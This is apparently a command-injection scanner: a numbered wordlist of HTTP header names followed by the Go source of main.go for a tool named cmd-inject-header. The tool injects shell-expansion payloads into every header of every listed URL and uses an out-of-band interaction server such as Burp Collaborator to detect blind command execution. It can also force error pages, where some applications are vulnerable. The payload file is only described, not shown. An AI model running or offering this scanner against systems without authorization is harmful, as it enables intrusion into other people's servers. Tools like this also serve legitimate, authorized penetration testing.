| X-Rest-Cors 1044 | X-Rest-Password 1045 | X-Rest-Username 1046 | X-Rewrite-Url 1047 | X-Sakura-Forwarded-For 1048 | X-Scalr-Auth-Key 1049 | X-Scalr-Auth-Token 1050 | X-Scalr-Env-Id 1051 | X-Scanner 1052 | X-Scheme 1053 | X-Screen-Height 1054 | X-Screen-Width 1055 | X-Sendfile-Type 1056 | X-Serial-Number 1057 | X-Serialize 1058 | X-Server-Id 1059 | X-Server-Name 1060 | X-Server-Port 1061 | X-Signature 1062 | X-Sina-Proxyuser 1063 | X-Skyfire-Phone 1064 | X-Skyfire-Screen 1065 | X-Ssl 1066 | X-Subdomain 1067 | X-Te 1068 | X-Teamsite-Preremap 1069 | X-Test-Session-Id 1070 | X-Timer 1071 | X-Tine20-Jsonkey 1072 | X-Tine20-Request-Type 1073 | X-Tomboy-Client 1074 | X-Tor 1075 | X-Twilio-Signature 1076 | X-Ua-Device 1077 | X-Ucbrowser-Device-Ua 1078 | X-UIDH 1079 | X-Uidh 1080 | X-Unique-Id 1081 | X-Uniquewcid 1082 | X-Up-Calling-Line-Id 1083 | X-Up-Devcap-Iscolor 1084 | X-Up-Devcap-Screendepth 1085 | X-Up-Devcap-Screenpixels 1086 | X-Up-Subno 1087 | X-Update 1088 | X-Update-Range 1089 | X-Upload-Maxresolution 1090 | X-Upload-Name 1091 | X-Upload-Size 1092 | X-Upload-Type 1093 | 
X-Url-Scheme 1094 | X-User 1095 | X-User-Agent 1096 | X-Username 1097 | X-Varnish 1098 | X-Verify-Credentials-Authorization 1099 | X-Vodafone-3gpdpcontext 1100 | X-Wap-Client-Sdu-Size 1101 | X-Wap-Clientid 1102 | X-Wap-Gateway 1103 | X-Wap-Network-Client-Ip 1104 | X-Wap-Network-Client-Msisdn 1105 | X-Wap-Profile 1106 | X-Wap-Proxy-Cookie 1107 | X-Wap-Session-Id 1108 | X-Wap-Tod 1109 | X-Wap-Tod-Coded 1110 | X-Whatever 1111 | X-Wikimedia-Debug 1112 | X-Wp-Nonce 1113 | X-Wp-Pjax-Prefetch 1114 | X-Ws-Api-Key 1115 | X-Xc-Schema-Version 1116 | X-Xhprof-Debug 1117 | X-Xhr-Referer 1118 | X-Xmlhttprequest 1119 | X-Xpid 1120 | X-Zikula-Ajax-Token 1121 | X-Zotero-Version 1122 | X-Ztgo-Bearerinfo 1123 | X_alto_ajax_key 1124 | Xauthorization 1125 | Xonnection 1126 | Xpdb-Debugger 1127 | Xproxy 1128 | Xroxy-Connection 1129 | Xxx-Real-Ip 1130 | Xxxxxxxxxxxxxxx 1131 | Y 1132 | Zotero-Api-Version 1133 | Zotero-Write-Token 1134 | Accept-Patch 1135 | Alt-Svc 1136 | Delta-Base 1137 | ETag 1138 | IM 1139 | P3P 1140 | WWW-Authenticate 1141 | X-Frame-Options 1142 | X-HTTP-Method-Override 1143 | x-wap-profile 1144 | Accept-CH 1145 | Accept-CH-Lifetime 1146 | Clear-Site-Data 1147 | Cross-Origin-Resource-Policy 1148 | DPR 1149 | Device-Memory 1150 | Early-Data 1151 | Expect-CT 1152 | Feature-Policy 1153 | Sec-Fetch-Dest 1154 | Sec-Fetch-Mode 1155 | Sec-Fetch-Site 1156 | Sec-Fetch-User 1157 | Sec-WebSocket-Accept 1158 | Server-Timing 1159 | SourceMap 1160 | Want-Digest 1161 | X-DNS-Prefetch-Control 1162 | X-ProxyUser-Ip 1163 | X-XSS-Protection 1164 | Public-Key-Pins 1165 | Public-Key-Pins-Report-Only 1166 | Sec-Fetch-Site 1167 | Sec-Fetch-Mode 1168 | Sec-Fetch-User 1169 | Sec-Fetch-Dest 1170 | Last-Event-ID 1171 | Ping-From 1172 | NEL 1173 | Sec-WebSocket-Key 1174 | Sec-WebSocket-Extensions 1175 | Sec-WebSocket-Accept 1176 | Sec-WebSocket-Protocol 1177 | Sec-WebSocket-Version 1178 | Accept-Push-Policy 1179 | Accept-Signature 1180 | Alt-Svc 1181 | Date 1182 | Signed-Headers 1183 | 
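// File: main.go

// Command cmd-inject-header probes every URL in a list with every
// header/payload combination from two more lists, substituting the caller's
// interaction server into each payload, and prints one result line per
// request. See README.md for the flags.
//
// The repository ships example lists: headers_common.txt (User-Agent, Accept),
// headers_all.txt (a long list of header names), payloads.txt (six
// shell-expansion payloads that reference INTERACT_SERVER) and urls.txt.
// go.mod: module cmd-inject-header, go 1.17.
package main

import (
	"cmd-inject-header/core"
	"flag"
	"fmt"
	"os"
	"strings"
	"time"
)

// interactPlaceholder is the token in payload lines that is replaced by the
// -it server name.
const interactPlaceholder = "INTERACT_SERVER"

// errorSuffix is appended to each URL when -se is set so the target answers
// with a 4xx/5xx page; some applications only reach the vulnerable code on
// their error path. It is plain concatenation, hence the README's note that
// URLs must end with "/".
const errorSuffix = "toMakeError"

func main() {
	flagCheck := flag.NewFlagSet("cmd-inject-header", flag.ExitOnError)
	hdName := flagCheck.String("hd", "", "Path to list header file")
	urName := flagCheck.String("ur", "", "Path to list url file (URL have / in the end: http://example.com/)")
	plName := flagCheck.String("pl", "", "Path to list payload file")
	itServer := flagCheck.String("it", "", "Your interact server to check the interaction (dnslog.cn/burp collabarator/interact.sh...)")
	sendErr := flagCheck.Bool("se", false, "If you want send request for status code 4xx/5xx")
	// With ExitOnError, Parse exits instead of returning an error; the
	// explicit discard keeps vet/staticcheck quiet about the ignored result.
	_ = flagCheck.Parse(os.Args[1:])

	if *hdName == "" || *plName == "" || *urName == "" || *itServer == "" {
		printUsage()
		// Exit non-zero so wrapping scripts notice a misconfigured run; the
		// original fell through and returned 0. flag uses 2 for usage errors.
		os.Exit(2)
	}

	start := time.Now()
	urls := core.ReadFromFile(*urName)
	headers := core.ReadFromFile(*hdName)
	payloads := expandPayloads(core.ReadFromFile(*plName), *itServer)

	total := len(payloads) * len(headers) * len(urls)
	fmt.Println("Total request will send: ", total)

	// One goroutine per URL; each fans out further inside core, so all
	// `total` requests may be in flight at the same time with no bound.
	ch := make(chan string)
	for _, url := range urls {
		target := url
		if *sendErr {
			target = url + errorSuffix
		}
		go core.MakeRequestHeader(target, headers, payloads, ch)
	}
	// Fan-in: exactly one "Done Url" line per URL.
	for range urls {
		fmt.Println(<-ch)
	}
	fmt.Printf("%.2fs elapsed\n", time.Since(start).Seconds())
}

// printUsage mirrors the two example invocations from the README.
func printUsage() {
	fmt.Println("Usage : go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net")
	fmt.Println("Usage : go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net -se=true")
	fmt.Print("(To send request for status code 4xx/5xx. Sometime app only vuln with this status code!)")
}

// expandPayloads returns a copy of raw with every INTERACT_SERVER token
// replaced by server, preserving order and count (blank lines included, so
// the request total printed by main matches what is sent).
func expandPayloads(raw []string, server string) []string {
	out := make([]string, 0, len(raw))
	for _, p := range raw {
		out = append(out, strings.ReplaceAll(p, interactPlaceholder, server))
	}
	return out
}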